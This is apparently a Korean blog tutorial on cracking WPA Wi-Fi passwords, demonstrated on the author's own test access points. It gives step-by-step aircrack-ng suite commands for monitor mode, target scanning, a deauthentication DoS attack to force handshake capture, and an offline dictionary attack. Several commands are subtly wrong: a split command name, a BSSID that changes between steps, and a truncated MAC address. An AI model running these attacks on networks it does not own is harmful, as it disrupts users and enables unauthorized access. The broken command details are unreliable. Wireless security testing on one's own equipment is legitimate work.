강화된 WPA Wireless

1. 강화된 WPA

WPA는 WEP의 약점을 보완하기 위해 나온 새 무선랜 암호화 규격이다. WEP처럼 패킷마다 암호키를 거는 것보다 더 강력한 방법으로 암호화 하기 때문에 패킷 캡쳐 후 크랙할 수가 없다. WPA Key 크래킹에는 클라이언트가 반드시 필요하다. WPA 크랙 방식은 AP와 클라이언트가 서로 암호를 인증하는 시기, 즉 Handshake 순간을 잡아내야 한다.


2. How to Attack - WPA

테스트 AP는 WEP, WPA암호화가 걸려있는 D-Link DIR-600모델로 테스트를 하였다.

MODEL

SSID

암호화방식

AP1

D-Link DIR-600

WEPtest

WEP

AP2

D-Link DIR-600

WPAtest

WPA


WPA를 크래킹 하기 위한 기본적인 단계는 다음과 같다.

   1. 무선랜을 모니터(monitor) 모드로 변경하기

   2. 전체적 스캐닝으로 공격대상 AP 정보 확인

   3. 타켓AP 스케닝과 함께 무선 데이터의 저장(Handshake 순간잡기)

   4. Dos어택

   5. handshake 얻기

   6. aircrack-ng를 이용하여 handshake에 사전어택 크래킹

1) 전체적 스캐닝으로 공격대상 AP 정보 확인


  무선랜을 모니터 모드로 변경하기는 WEA방식과 동일 하다.

  전체적인 스캐닝을 실행시키면 무선랜 주변으로 어떤 AP가 있는 지와 함께 부가정보를 확인할 수 있게 된다.

  공격대상은 WPA암호화 방식의 AP이므로 WPA암호화 방식의 AP를 찾아 BSSID(AP의 맥주소), 체널, ESSID등을

  체크해서  다음 단계로 넘어간다.           

  

   실행 명령어 : airodump -ng mon0

 

< 전체적 스캐닝 실행 화면 >


2) 타켓AP 스케닝과 함께 스니핑


          실행명령어 : airodump-ng -c 9 --bssid 5c:d9:98:e0:f4:78 -w test.txt mon0

   -c 는 무선 네트워크의 채널을 의미한다. 대상AP의 채널을 뒤에 적는다.

   --bssid 는 공격 하고자 하는 AP의 MAC 주소를 의미한다. 대상AP의 MAC주소를 뒤에 적는다.

   -w 는 데이터를 저장 할 파일의 이름을 적는다.

<타켓AP 스케닝과 데이터의 저장 실행 화면>


3) 붙어있는 스테이션 확인


앞에서 타겟AP에 스니핑이 되었다. WPA Preshared Key 크래킹에는 클라이언트가 반드시 필요하다. WPA 암호화 방식은 AP와 클라이언트가 서로 암호를 인증하는 시기, 즉 Handshake 순간을 잡아내야 하기 때문이다.


4) DOS Attack


airmon-ng start 무선랜 인터페이스 명령어를 입력하시면 그 무선랜은 Monitor mode로 전환된다.

보통의 경우에 랜카드는 모든 패킷이 아닌 자기 자신에게 오는 패킷만 받아들인다. 즉 모니터 모드는

패킷을 주입할 수 있도록 해 주는 단계이다.


실행 명령어 : airmon-ng start wlan0 3


airmon-ng 명령어를 통해 무선 인터페이스에서 모니터모드로 이용 할 수 있다.

airmon-ng <start|stop> <interface> [channel]

<start|stop>         :  사용자가 특정인터페이스를 사용하고 싶으면 start

                        사용하고 싶지 않으면 stop을 선택해서 입력한다.       

<interface>          :  인터페이스를 명시한다.

[channel]           :  선택적으로 wireless NIC를 특정주파수로 설정할 수 있다.

이제 패킷을 주입할 수 있게 되면 aireplay-ng 명령어를 통해

Deauthentication 공격법을 통해 특정 AP에 연결되어 있는 하나 혹은 다수의 Station에 연결

해제시키는 packet을 보낸다. Station에게 재 인증을 강제로 하면서 WPA handshake를 캡쳐할수 있다.


실행 명령어 : aireplay-ng -0 5000 -a 5c:d9:98:e0:f4:66 -c 00:1e:d1:48:04 mon0

              -0 deauthentication을 의미한다. 뒤에숫자는 얼마만큼 날리겠다는 의미

              -a 05c:d9:98:e0:f4:66 AP의 MAC 주소이다.

              -c 00:1e:d1:48:04 deathentication을 할 스테이션의 MAC주소 이다.

               이것을 생략하면 모든 Station을 deauthenticaion 한다.

               mon0 는 인터페이스 이름이다.


<Dos 어택공격 실행화면>


<handshake 얻은화면>

5) aircrack-ng를 이용하여 handshake에 사전어택 크래킹


   얻어진 handshake 파일과 사전파일로 aircrack-ng 명령을 통해 크랙한다.

   명령어 : aircrack-ng -z test-01.cap -w textfile.txt

          -z 수집된 대이터 파일명을 뒤에 적어준다.

          -w 사전파일명을 적어준다.





덧글

댓글 입력 영역